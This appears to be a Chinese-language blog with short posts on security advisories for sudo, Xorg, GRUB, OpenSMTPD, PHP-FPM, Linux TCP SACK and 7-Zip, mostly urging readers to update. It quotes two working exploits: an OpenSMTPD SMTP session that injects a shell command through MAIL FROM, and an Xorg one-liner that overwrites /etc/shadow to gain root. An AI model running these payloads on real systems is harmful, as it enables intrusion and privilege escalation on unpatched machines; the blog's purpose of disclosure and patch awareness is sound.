幹壞事是進步最大的原動力
在 Hacker News 首頁上看到好幾則都在講 CVE-2021-32471:
Insufficient input validation in the Marvin Minsky 1967 implementation of the Universal Turing Machine allows program users to execute arbitrary code via crafted data. For example, a tape head may have an unexpected location after the processing of input composed of As and Bs (instead of 0s and 1s). NOTE: the discoverer states "this vulnerability has no real-world implications."
等下,今天不是四月第一天啊,現在已經五月多了啊...
Sudo 這次的安全性漏洞頗痛的:「CVE-2021-3156: Heap-Based Buffer Overflow in Sudo (Baron Samedit)」。
依照 Sudo Security Alerts 這邊的說明,這次的漏洞只要是本機有執行權限的人都有機會打穿,不需要有 sudo 帳號權限:
A potential security issue exists in sudo that could be used by a local user to gain root privileges even when not listed in the sudoers file. Affected sudo versions are 1.8.2 through 1.8.31p2 and 1.9.0 through 1.9.5p1. Sudo 1.9.5p2 and above are not affected.
不限於本來就有 sudo 帳號 (但可能可執行指令受限) 就比較麻煩了,這代表從 web 之類的管道打進去以後 (可能是 www-data 身份),就可以用這個洞取得 root 權限,另外一條路是透過資料庫打進去後 (像是 mysql 身份) 取得。
該來把一堆機器更新了...
在 Hacker News Daily 上看到「Screensaver lock by-pass via the virtual keyboard」這篇,裡面這邊題到了 screensaver lock 的有趣話題。
先講嚴肅一點的,這個 bug 被編號為 CVE-2020-25712,問題出在 xorg-x11-server 上:
A flaw was found in xorg-x11-server before 1.20.10. A heap-buffer overflow in XkbSetDeviceInfo may lead to a privilege escalation vulnerability. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
比較有趣的事情是,這個 bug 是小朋友在亂玩時拉出 virtual keyboard 觸發的:
A few weeks ago, my kids wanted to hack my linux desktop, so they typed and clicked everywhere, while I was standing behind them looking at them play... when the screensaver core dumped and they actually hacked their way in! wow, those little hackers...
然後他說他自己搞不出來:
I tried to recreate the crash on my own with no success, maybe because it required more than 4 little hands typing and using the mouse on the virtual keyboard.
另外一個人也說他家小朋友也弄出 segfault 了:
My kids came upon a similar cinnamon-screensaver segfault! I've emailed details of how to reproduce the problem to root@linuxmint.com.
小朋友超強 XDDD
看到 Ubuntu 16.04 (xenial) 在 support cycle 剩下不到一年的時候推出了 16.04.7:「Ubuntu 16.04.7 LTS released」。
看起來主要是修正 GRUB 的安全性問題:「USN-4432-1: GRUB 2 vulnerabilities」。
這次修正的 CVE 好像有點多,但全部都是與 GRUB 相關的... 另外可以看到包括 14.04 (trusty) 都有修正 (ESM,付費提供支援的版本)。
目前手上大多數機器都是 18.04 (bionic) 與 20.04 (focal) 了,會在 16.04 (xenial) 主要是 OpenVZ 的關係,雖然看起來還是有一台一直懶得動,該找機會弄一弄了...
在「OpenBSD OpenSMTPD Remote Code Execution Vulnerability (CVE-2020-7247)」這邊看到頗意外的 OpenSMTPD RCE,而且從「Qualys Security Advisory LPE and RCE in OpenSMTPD (CVE-2020-7247)」這邊的範例可以看到是個淺顯易懂的 exploit:
$ nc 192.168.56.143 25
220 obsd66.example.org ESMTP OpenSMTPD
HELO professor.falken
250 obsd66.example.org Hello professor.falken [192.168.56.1], pleased to meet you
MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>
250 2.0.0 Ok
RCPT TO:<root@example.org>
250 2.1.5 Destination address valid: Recipient ok
DATA
354 Enter mail, end with "." on a line by itself
#0
#1
#2
#3
#4
#5
#6
#7
#8
#9
#a
#b
#c
#d
for i in W O P R; do
echo -n "($i) " && id || break
done >> /root/x."`id -u`"."$$"
.
250 2.0.0 4cdd24df Message accepted for delivery
QUIT
221 2.0.0 Bye
這樣有點歡樂...
看到 phpBB 公告的「phpBB 3.2.9 Release - Please Update」這邊,裡面提到了安全性更新的 CVE 編號:
The issues have been assigned CVE-2020-5501 and CVE-2020-5502 respectively.
想說今年也才過完六天而已... 撈了一下資料,發現寫這篇文章當下,CVE 編號已經被申請到 CVE-2020-5956 了,這速度有夠快 XDDD
這次的漏洞是在打 CTF (capture the flag) 的時候發現的,這個安全漏洞已經被給 CVE 編號並且修正了:「CVE-2019-11043」,回報者與官方的討論可以在「Sec Bug #78599 env_path_info underflow in fpm_main.c can lead to RCE」這邊看到。從回報的標題可以知道這次頗熱鬧的原因,是因為這次有機會 RCE (remote code execution)...
在「PHuiP-FPizdaM」這邊可以看到比較系統性的整理 (以及 exploit),看起來雖然有不少條件,但都不算太特別的指令,如果以全世界的機器來看,應該會有不少機器中獎...
這幾天的 Linux 主機都有收到 kernel 的更新,起因於 Netflix 發現並與社群一起修正了一系列 Linux 與 FreeBSD 上 TCP 實做 MSS 與 SACK 的安全性問題:「https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-001.md」。
其中最嚴重的應該是 CVE-2019-11477 這組,可以導致 Linux kernel panic,影響範圍從 2.6.29 開始的所有 kernel 版本。能夠升級的主機可以直接修正,無法升級的主機可以參考提出來的兩個 workaround:
Workaround #1: Block connections with a low MSS using one of the supplied filters. (The values in the filters are examples. You can apply a higher or lower limit, as appropriate for your environment.) Note that these filters may break legitimate connections which rely on a low MSS. Also, note that this mitigation is only effective if TCP probing is disabled (that is, the
net.ipv4.tcp_mtu_probingsysctl is set to 0, which appears to be the default value for that sysctl).Workaround #2: Disable SACK processing (
/proc/sys/net/ipv4/tcp_sackset to 0).
第一個 workaround 是擋掉 MSS 過小的封包,但不保證就不會 kernel panic (文章裡面用語是 mitigation)。
第二個 workaround 是直接關掉 SACK,這組 workaround 在有 packet loss 的情況下效能會掉的比較明顯,但看起來可以避免直接 kernel panic...
在 Twitter 上看到的 security issue,好久沒在這麼普及的軟體上看到這種 bug 了:
#CVE-2018-14665 - a LPE exploit via https://t.co/eax3fvaAjE fits in a tweet
cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su
Overwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected.
— Hacker Fantastic (@hackerfantastic) October 25, 2018
在 CVE - CVE-2018-14665 的說明裡面有提到 1.20.3 前的版本都有中,但沒講到從哪個版本開始,看起來是全系列...?
A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission check for -modulepath and -logfile options when starting Xorg. X server allows unprivileged users with the ability to log in to the system via physical console to escalate their privileges and run arbitrary code under root privileges.
這一臉 orz...
7-Zip 被發現安全性問題 (CVE-2018-10115):「7-Zip: From Uninitialized Memory to Remote Code Execution」。而在 2018/04/30 推出的 18.05 修正了這個問題:「7-Zip 18.05」。
The vulnerability in RAR unpacking code was fixed (CVE-2018-10115).
除了修正以外,另外也開了 ASLR,對安全性會多一些防禦:
2018-03-06 - Discovery
2018-03-06 - Report
2018-04-14 - MITRE assigned CVE-2018-10115
2018-04-30 - 7-Zip 18.05 released, fixing CVE-2018-10115 and enabling ASLR on the executables.
手上有裝 7-Zip 的人要記得更新...